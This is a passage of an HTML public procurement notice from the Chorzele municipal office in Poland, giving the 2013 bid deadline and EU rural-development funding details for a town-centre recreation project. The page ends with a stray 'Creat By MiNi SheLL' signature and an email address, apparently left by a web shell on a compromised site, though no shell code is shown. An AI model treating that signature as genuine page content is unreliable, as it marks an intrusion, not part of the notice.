<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.07.2013 godzina 12:00, miejsce: Urząd Miasta i Gminy w Chorzelach, ul. Stanisława Komosińskiego 1, 06-330 Chorzele (sekretariat - I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program Rozwoju Obszarów Wiejskich na lata 2007-2013, Działanie 413 Wdrażanie lokalnych strategii rozwoju w zakresie operacji odpowiadających warunkom przyznania pomocy w ramach działania - Odnowa i rozwój wsi. Tytuł projektu - Stworzenie miejsca do rekreacji i wypoczynku w centrum Chorzel. 
Poziom dofinansowania - 80% poniesionych kosztów kwalifikowalnych.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com